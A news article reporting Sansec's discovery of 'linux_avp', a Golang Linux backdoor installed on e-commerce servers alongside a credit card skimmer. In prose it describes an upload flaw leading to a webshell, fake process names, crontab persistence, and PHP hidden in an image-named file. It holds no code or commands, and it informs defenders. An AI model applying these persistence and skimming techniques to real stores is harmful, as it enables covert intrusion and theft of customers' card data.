With skimmer software, hackers use a Linux backdoor on compromised e-commerce sites

With skimmer software, hackers use a Linux backdoor on compromised e-commerce sites

Sansec Threat Research Team has found a new malicious agent called “linux avp” that disguises itself as a system process on e-commerce systems. According to them, hackers have been spreading this malware around the world since last week, and it receives commands from a Beijing-based control server.

After deploying a credit card skimmer on merchant websites, security experts have discovered a new hacking effort that instals a Linux backdoor on hacked e-commerce sites.

Highlights

  • After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a webshell and modified the server code to intercept customer data,” said researchers.

  • In the campaign, hackers started automated e-commerce attack probes, testing for dozens of weaknesses in common online store platforms.

“Analysis of linux_avp suggests that it serves as a backdoor, waiting for commands from a Beijing (Alibaba) hosted server,” said researchers. The backdoor also revealed where the user, known as “dob” built the backdoor in a project folder lin_avp, using code name GREECE.

Researchers said hackers then uploaded the linux_avp malware, which is a Golang program that starts, removes itself from disk, and disguises as a fake ps -ef process.

The malware also injects a malicious crontab entry to ensure access in case that the process is removed or the server rebooted. The crontab downloads the Golang malware executable to a random writable directory and installs two configuration files. “One contains a public key, which is presumably used to ensure that no one, but the malware owner can launch commands,” researchers added.

This case has another Chinese connection, according to researchers, as a line was added to the e-commerce platform code called app/design/frontend/favicon_absolute_top.jpg, which contains PHP code to retrieve a fake payment form and inject it in the store. Researchers said the IP for this was hosted in Hong Kong and was previously observed as a skimming exfiltration endpoint in July and August of this year.

Researchers said, at the time of writing, no other antivirus vendor had recognized the malware. “Curiously, one individual had submitted the same malware to Virustotal on Oct 8th with the comment “test”. This was just one day after the successful breach of our customer’s store,” said researchers.

They added that the person uploading the malware could very well be the malware author, who wanted to assert that common antivirus engines will not detect their creation.